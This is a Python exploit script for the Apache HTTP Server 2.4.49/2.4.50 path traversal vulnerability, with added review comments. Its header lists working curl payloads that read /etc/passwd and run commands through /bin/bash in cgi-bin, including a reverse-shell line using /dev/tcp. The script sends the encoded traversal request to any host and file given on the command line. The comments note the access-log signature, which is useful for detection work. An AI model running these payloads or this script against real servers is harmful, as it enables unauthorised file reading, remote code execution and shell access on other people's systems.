#!/usr/bin/env python3
import sys
import requests
"""
[+] Exploit Title: Apache HTTP Server 2.4.49 Path Traversal
[+] Payload without cgi-bin: curl -v 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd'
[+] Payload with cgi-bin =): curl -v 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"
[+] Payload without cgi-bin: apache 2.4.50: .%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
[+] Payload with cgi-bin =): apache 2.4.50: curl -v 'http://localhost:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
{+} It worked: curl -v 'http://localhost:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/target/1234 0>&1' -H "Content-Type: text/plain" =)
"""
def main():
    """Send one GET request built from the command line and print the response body.

    Argument handling (all read from ``sys.argv``):
      argv[1] == '-h'  -> print the usage example and return.
      otherwise        -> argv[1] is the target host, argv[2] the file path; the
                          request URL is ``http://`` + target + traversal prefix + file.

    Side effects: writes to stdout; on any exception inside the request branch
    prints a generic message and calls ``exit()``.

    NOTE(review): the usage example printed for ``-h`` shows the target *with*
    an ``http://`` scheme, but the request line below prepends ``http://`` itself,
    so following the example literally yields ``http://http://...``.
    """
    # NOTE(review): argv[1] is read outside the try/except below, so invoking the
    # script with no arguments raises IndexError here rather than printing the
    # friendly message.
    if sys.argv[1] == '-h':
        h = '''
Example: python3 exploit-cve2021.py http://4P4(|-|3\/UL|\|3r4BL3-74r937 /file
'''
        print(h)
    else:
        try:
            target = sys.argv[1] # Your desired [target] url.
            file = sys.argv[2] # Your desired [file] to request.
            # Encoded-dot traversal prefix (the ".%2e" form the banner above ties
            # to Apache 2.4.49). From a defender's side this exact substring is
            # what appears in the access log for every request this script sends.
            payload = '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/'
            # target and file are interpolated unvalidated; the scheme is fixed to
            # plain http, so an https-only target cannot be addressed.
            response = requests.get(f'http://{target}{payload}{file}')
            print(response.text)
        except:
            # Bare except: also swallows KeyboardInterrupt/SystemExit and hides the
            # real cause (IndexError for a missing argv[2], connection errors, ...).
            print('[-] Check your arguments again, bro.')
            # NOTE(review): indentation was lost in the paste; exit() is placed in
            # the except branch here — confirm against the original file.
            exit()
if __name__ == '__main__':
    # Entry-point guard: main() runs only when the file is executed directly, not on import.
    main()